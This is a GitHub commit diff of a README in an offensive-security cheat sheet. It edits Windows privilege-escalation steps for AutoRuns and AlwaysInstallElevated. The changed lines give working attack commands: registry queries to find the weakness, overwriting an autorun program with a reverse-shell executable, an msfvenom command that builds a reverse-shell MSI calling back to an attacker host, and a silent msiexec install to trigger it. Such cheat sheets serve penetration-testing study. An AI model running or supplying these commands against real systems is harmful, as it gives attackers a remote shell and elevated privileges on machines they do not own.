kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-10-26 12:47:53 -04:00
committed by GitHub
parent 1287459e76
commit a60fc637a7
1 changed files with 6 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
README.md
View File

@@ -1330,7 +1330,7 @@ net start dllsvc
<br />
##### Always Install Elevated
##### AutoRuns
```ps1
#########################################################################
@@ -1351,6 +1351,7 @@ reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
```
##### Always Install Elevated
![image](https://user-images.githubusercontent.com/59018247/198085925-00b477ac-15ec-40f0-9910-abc520f47ab2.png)
@@ -1362,13 +1363,15 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
# Winpeas Enumeration to see if both registry values are set
.\winPEASany.exe quiet windowscreds
# Manual Enumeration
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP ADDRESS} LPORT={PORT} -f msi -o reverse.msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f msi -o reverse.msi
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
msiexec /quiet /qn /i C:\users\public\downloads\reverse.msi
```